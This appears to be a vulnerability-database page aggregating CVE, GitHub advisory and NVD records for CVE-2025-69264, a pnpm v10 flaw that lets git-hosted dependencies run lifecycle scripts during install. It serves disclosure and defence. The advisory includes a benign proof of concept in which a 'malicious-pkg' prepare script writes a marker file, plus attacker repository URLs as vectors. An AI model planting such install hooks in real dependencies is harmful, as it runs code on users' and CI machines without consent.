CVE-2025-69264 (GCVE-0-2025-69264)

Vulnerability from cvelistv5 – Published: 2026-01-07 21:53 – Updated: 2026-01-09 04:55

Title

pnpm v10+ Bypass "Dependency lifecycle scripts execution disabled by default"

Summary

pnpm is a package manager. Versions 10.0.0 through 10.25 allow git-hosted dependencies to execute arbitrary code during pnpm install, circumventing the v10 security feature "Dependency lifecycle scripts execution disabled by default". While pnpm v10 blocks postinstall scripts via the onlyBuiltDependencies mechanism, git dependencies can still execute prepare, prepublish, and prepack scripts during the fetch phase, enabling remote code execution without user consent or approval. This issue is fixed in version 10.26.0.

Severity ?

8.8 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-693 - Protection Mechanism Failure

Assigner

GitHub_M

References

URL

Tags

	https://github.com/pnpm/pnpm/security/advisories/…	x_refsource_CONFIRM
	https://github.com/pnpm/pnpm/commit/73cc63504d9bc…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	pnpm	pnpm	Affected: > 10.0.0, < 10.26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-69264",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-08T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-09T04:55:28.848Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "pnpm",
          "vendor": "pnpm",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e 10.0.0, \u003c 10.26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "pnpm is a package manager. Versions 10.0.0 through 10.25 allow git-hosted dependencies to execute arbitrary code during pnpm install, circumventing the v10 security feature \"Dependency lifecycle scripts execution disabled by default\". While pnpm v10 blocks postinstall scripts via the onlyBuiltDependencies mechanism, git dependencies can still execute prepare, prepublish, and prepack scripts during the fetch phase, enabling remote code execution without user consent or approval. This issue is fixed in version 10.26.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-693",
              "description": "CWE-693: Protection Mechanism Failure",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-07T21:53:09.806Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/pnpm/pnpm/security/advisories/GHSA-379q-355j-w6rj",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-379q-355j-w6rj"
        },
        {
          "name": "https://github.com/pnpm/pnpm/commit/73cc63504d9bc360c43e4b2feb9080677f03c5b5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/pnpm/pnpm/commit/73cc63504d9bc360c43e4b2feb9080677f03c5b5"
        }
      ],
      "source": {
        "advisory": "GHSA-379q-355j-w6rj",
        "discovery": "UNKNOWN"
      },
      "title": "pnpm v10+ Bypass \"Dependency lifecycle scripts execution disabled by default\""
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-69264",
    "datePublished": "2026-01-07T21:53:09.806Z",
    "dateReserved": "2025-12-31T01:11:50.649Z",
    "dateUpdated": "2026-01-09T04:55:28.848Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-69264\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-01-07T22:15:43.890\",\"lastModified\":\"2026-01-08T18:08:54.147\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"pnpm is a package manager. Versions 10.0.0 through 10.25 allow git-hosted dependencies to execute arbitrary code during pnpm install, circumventing the v10 security feature \\\"Dependency lifecycle scripts execution disabled by default\\\". While pnpm v10 blocks postinstall scripts via the onlyBuiltDependencies mechanism, git dependencies can still execute prepare, prepublish, and prepack scripts during the fetch phase, enabling remote code execution without user consent or approval. This issue is fixed in version 10.26.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-693\"}]}],\"references\":[{\"url\":\"https://github.com/pnpm/pnpm/commit/73cc63504d9bc360c43e4b2feb9080677f03c5b5\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pnpm/pnpm/security/advisories/GHSA-379q-355j-w6rj\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-69264\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-01-08T14:37:58.005629Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-01-08T14:38:45.766Z\"}}], \"cna\": {\"title\": \"pnpm v10+ Bypass \\\"Dependency lifecycle scripts execution disabled by default\\\"\", \"source\": {\"advisory\": \"GHSA-379q-355j-w6rj\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"pnpm\", \"product\": \"pnpm\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e 10.0.0, \u003c 10.26.0\"}]}], \"references\": [{\"url\": \"https://github.com/pnpm/pnpm/security/advisories/GHSA-379q-355j-w6rj\", \"name\": \"https://github.com/pnpm/pnpm/security/advisories/GHSA-379q-355j-w6rj\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/pnpm/pnpm/commit/73cc63504d9bc360c43e4b2feb9080677f03c5b5\", \"name\": \"https://github.com/pnpm/pnpm/commit/73cc63504d9bc360c43e4b2feb9080677f03c5b5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"pnpm is a package manager. Versions 10.0.0 through 10.25 allow git-hosted dependencies to execute arbitrary code during pnpm install, circumventing the v10 security feature \\\"Dependency lifecycle scripts execution disabled by default\\\". While pnpm v10 blocks postinstall scripts via the onlyBuiltDependencies mechanism, git dependencies can still execute prepare, prepublish, and prepack scripts during the fetch phase, enabling remote code execution without user consent or approval. This issue is fixed in version 10.26.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-693\", \"description\": \"CWE-693: Protection Mechanism Failure\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-01-07T21:53:09.806Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-69264\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-01-08T14:38:49.231Z\", \"dateReserved\": \"2025-12-31T01:11:50.649Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-01-07T21:53:09.806Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-379Q-355J-W6RJ

Vulnerability from github – Published: 2026-01-07 19:07 – Updated: 2026-01-08 20:05

Summary

pnpm v10+ Bypass "Dependency lifecycle scripts execution disabled by default"

Details

pnpm v10+ Git Dependency Script Execution Bypass

Summary

A security bypass vulnerability in pnpm v10+ allows git-hosted dependencies to execute arbitrary code during pnpm install, circumventing the v10 security feature "Dependency lifecycle scripts execution disabled by default". While pnpm v10 blocks postinstall scripts via the onlyBuiltDependencies mechanism, git dependencies can still execute prepare, prepublish, and prepack scripts during the fetch phase, enabling remote code execution without user consent or approval.

Details

pnpm v10 introduced a security feature to disable dependency lifecycle scripts by default (PR #8897). This is implemented by setting onlyBuiltDependencies = [] when no build policy is configured:

File: pkg-manager/core/src/install/extendInstallOptions.ts (lines 290-291)

if (opts.neverBuiltDependencies == null && opts.onlyBuiltDependencies == null && opts.onlyBuiltDependenciesFile == null) {
  opts.onlyBuiltDependencies = []
}

This creates an allowlist that blocks all packages from running scripts during the BUILD phase in exec/build-modules/src/index.ts.

However, git-hosted dependencies are processed differently. During the FETCH phase, git packages are prepared using preparePackage():

File: exec/prepare-package/src/index.ts (lines 28-57)

export async function preparePackage (opts: PreparePackageOptions, gitRootDir: string, subDir: string) {
  // ...
  if (opts.ignoreScripts) return { shouldBeBuilt: true, pkgDir }  // Only checks ignoreScripts, not onlyBuiltDependencies

  const execOpts: RunLifecycleHookOptions = {
    // ...
    rawConfig: omit(['ignore-scripts'], opts.rawConfig),  // Explicitly removes ignore-scripts!
  }

  // Runs npm/pnpm install
  await runLifecycleHook(installScriptName, manifest, execOpts)

  // Runs prepare scripts
  for (const scriptName of PREPUBLISH_SCRIPTS) {  // ['prepublish', 'prepack', 'publish']
    await runLifecycleHook(newScriptName, manifest, execOpts)
  }
}

The ignoreScripts option defaults to false and is completely separate from onlyBuiltDependencies. The onlyBuiltDependencies allowlist is never consulted during the fetch phase.

Affected scripts that execute during fetch: - prepare - prepublish - prepack

Attack vectors: - git+https://github.com/attacker/malicious.git - github:attacker/malicious - gitlab:attacker/malicious - bitbucket:attacker/malicious - git+ssh://git@github.com/attacker/malicious.git - git+file:///path/to/local/repo

PoC

Prerequisites: - pnpm v10.0.0 or later (tested on v10.23.0 and v11.0.0-alpha.1) - git

Steps to reproduce:

Extract the attached poc.zip
Run the PoC script: bash cd poc chmod +x run-poc.sh ./run-poc.sh
Verify the marker file was created by the malicious script: bash cat /tmp/pnpm-vuln-poc-marker.txt

Manual reproduction:

Create a malicious package with a prepare script: json { "name": "malicious-pkg", "version": "1.0.0", "scripts": { "prepare": "node -e \"require('fs').writeFileSync('/tmp/pwned.txt', 'RCE!')\"" } }
Initialize it as a git repo and commit the files
Create a victim project that depends on it (just have to make sure it actually git clones and not just downloads a tarball): json { "dependencies": { "malicious-pkg": "git+file:///path/to/malicious-pkg" } }
Run pnpm install - the prepare script executes without any warning or approval prompt

Impact

Severity: High

Who is impacted: - All pnpm v10+ users - Users who believed they were protected by the v10 "scripts disabled by default" feature - CI/CD pipelines

Attack scenarios: 1. Supply chain attack: An attacker compromises a dependency, adding to it a malicious git dependency that executes arbitrary code during pnpm install

What an attacker can do: - Execute arbitrary code with the victim's privileges - Exfiltrate environment variables, secrets, and credentials - Modify source code or inject backdoors - Establish persistence or reverse shells - Access the filesystem and network

Why this bypasses security expectations: - pnpm v10 changelog explicitly states "Lifecycle scripts of dependencies are not executed during installation by default" - Users expect git dependencies to follow the same security model as npm registry packages - There is no warning that git dependencies are treated differently - The onlyBuiltDependencies configuration does not affect git dependencies

Severity ?

8.8 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "pnpm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.0.0"
            },
            {
              "fixed": "10.26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-69264"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-693"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-07T19:07:43Z",
    "nvd_published_at": "2026-01-07T22:15:43Z",
    "severity": "HIGH"
  },
  "details": "# pnpm v10+ Git Dependency Script Execution Bypass\n\n### Summary\n\nA security bypass vulnerability in pnpm v10+ allows git-hosted dependencies to execute arbitrary code during `pnpm install`, circumventing the v10 security feature \"Dependency lifecycle scripts execution disabled by default\". While pnpm v10 blocks `postinstall` scripts via the `onlyBuiltDependencies` mechanism, git dependencies can still execute `prepare`, `prepublish`, and `prepack` scripts during the fetch phase, enabling remote code execution without user consent or approval.\n\n### Details\n\npnpm v10 introduced a security feature to disable dependency lifecycle scripts by default ([PR #8897](https://github.com/pnpm/pnpm/pull/8897)). This is implemented by setting `onlyBuiltDependencies = []` when no build policy is configured:\n\n**File:** `pkg-manager/core/src/install/extendInstallOptions.ts` (lines 290-291)\n```typescript\nif (opts.neverBuiltDependencies == null \u0026\u0026 opts.onlyBuiltDependencies == null \u0026\u0026 opts.onlyBuiltDependenciesFile == null) {\n  opts.onlyBuiltDependencies = []\n}\n```\n\nThis creates an allowlist that blocks all packages from running scripts during the **BUILD phase** in `exec/build-modules/src/index.ts`.\n\nHowever, git-hosted dependencies are processed differently. During the **FETCH phase**, git packages are prepared using `preparePackage()`:\n\n**File:** `exec/prepare-package/src/index.ts` (lines 28-57)\n```typescript\nexport async function preparePackage (opts: PreparePackageOptions, gitRootDir: string, subDir: string) {\n  // ...\n  if (opts.ignoreScripts) return { shouldBeBuilt: true, pkgDir }  // Only checks ignoreScripts, not onlyBuiltDependencies\n\n  const execOpts: RunLifecycleHookOptions = {\n    // ...\n    rawConfig: omit([\u0027ignore-scripts\u0027], opts.rawConfig),  // Explicitly removes ignore-scripts!\n  }\n\n  // Runs npm/pnpm install\n  await runLifecycleHook(installScriptName, manifest, execOpts)\n\n  // Runs prepare scripts\n  for (const scriptName of PREPUBLISH_SCRIPTS) {  // [\u0027prepublish\u0027, \u0027prepack\u0027, \u0027publish\u0027]\n    await runLifecycleHook(newScriptName, manifest, execOpts)\n  }\n}\n```\n\nThe `ignoreScripts` option defaults to `false` and is completely separate from `onlyBuiltDependencies`. The `onlyBuiltDependencies` allowlist is never consulted during the fetch phase.\n\n**Affected scripts that execute during fetch:**\n- `prepare`\n- `prepublish`\n- `prepack`\n\n**Attack vectors:**\n- `git+https://github.com/attacker/malicious.git`\n- `github:attacker/malicious`\n- `gitlab:attacker/malicious`\n- `bitbucket:attacker/malicious`\n- `git+ssh://git@github.com/attacker/malicious.git`\n- `git+file:///path/to/local/repo`\n\n### PoC\n\n**Prerequisites:**\n- pnpm v10.0.0 or later (tested on v10.23.0 and v11.0.0-alpha.1)\n- git\n\n**Steps to reproduce:**\n\n1. Extract the attached [poc.zip](https://github.com/user-attachments/files/23797816/poc.zip)\n\n2. Run the PoC script:\n   ```bash\n   cd poc\n   chmod +x run-poc.sh\n   ./run-poc.sh\n   ```\n\n3. Verify the marker file was created by the malicious script:\n   ```bash\n   cat /tmp/pnpm-vuln-poc-marker.txt\n   ```\n\n**Manual reproduction:**\n\n1. Create a malicious package with a `prepare` script:\n   ```json\n   {\n     \"name\": \"malicious-pkg\",\n     \"version\": \"1.0.0\",\n     \"scripts\": {\n       \"prepare\": \"node -e \\\"require(\u0027fs\u0027).writeFileSync(\u0027/tmp/pwned.txt\u0027, \u0027RCE!\u0027)\\\"\"\n     }\n   }\n   ```\n\n2. Initialize it as a git repo and commit the files\n\n3. Create a victim project that depends on it (just have to make sure it actually git clones and not just downloads a tarball):\n   ```json\n   {\n     \"dependencies\": {\n       \"malicious-pkg\": \"git+file:///path/to/malicious-pkg\"\n     }\n   }\n   ```\n\n4. Run `pnpm install` - the prepare script executes without any warning or approval prompt\n\n### Impact\n\n**Severity: High**\n\n**Who is impacted:**\n- All pnpm v10+ users\n- Users who believed they were protected by the v10 \"scripts disabled by default\" feature\n- CI/CD pipelines\n\n**Attack scenarios:**\n1. **Supply chain attack:** An attacker compromises a dependency, adding to it a malicious git dependency that executes arbitrary code during `pnpm install`\n\n**What an attacker can do:**\n- Execute arbitrary code with the victim\u0027s privileges\n- Exfiltrate environment variables, secrets, and credentials\n- Modify source code or inject backdoors\n- Establish persistence or reverse shells\n- Access the filesystem and network\n\n**Why this bypasses security expectations:**\n- pnpm v10 changelog explicitly states \"Lifecycle scripts of dependencies are not executed during installation by default\"\n- Users expect git dependencies to follow the same security model as npm registry packages\n- There is no warning that git dependencies are treated differently\n- The `onlyBuiltDependencies` configuration does not affect git dependencies",
  "id": "GHSA-379q-355j-w6rj",
  "modified": "2026-01-08T20:05:37Z",
  "published": "2026-01-07T19:07:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-379q-355j-w6rj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69264"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pnpm/pnpm/commit/73cc63504d9bc360c43e4b2feb9080677f03c5b5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pnpm/pnpm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "pnpm v10+ Bypass \"Dependency lifecycle scripts execution disabled by default\""
}

FKIE_CVE-2025-69264

Vulnerability from fkie_nvd - Published: 2026-01-07 22:15 - Updated: 2026-01-08 18:08

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/pnpm/pnpm/commit/73cc63504d9bc360c43e4b2feb9080677f03c5b5
	security-advisories@github.com	https://github.com/pnpm/pnpm/security/advisories/GHSA-379q-355j-w6rj

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "pnpm is a package manager. Versions 10.0.0 through 10.25 allow git-hosted dependencies to execute arbitrary code during pnpm install, circumventing the v10 security feature \"Dependency lifecycle scripts execution disabled by default\". While pnpm v10 blocks postinstall scripts via the onlyBuiltDependencies mechanism, git dependencies can still execute prepare, prepublish, and prepack scripts during the fetch phase, enabling remote code execution without user consent or approval. This issue is fixed in version 10.26.0."
    }
  ],
  "id": "CVE-2025-69264",
  "lastModified": "2026-01-08T18:08:54.147",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-01-07T22:15:43.890",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/pnpm/pnpm/commit/73cc63504d9bc360c43e4b2feb9080677f03c5b5"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-379q-355j-w6rj"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-693"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-69264 (GCVE-0-2025-69264)

GHSA-379Q-355J-W6RJ

pnpm v10+ Git Dependency Script Execution Bypass

Summary

Details

PoC

Impact

FKIE_CVE-2025-69264

Tags

Sightings

Nomenclature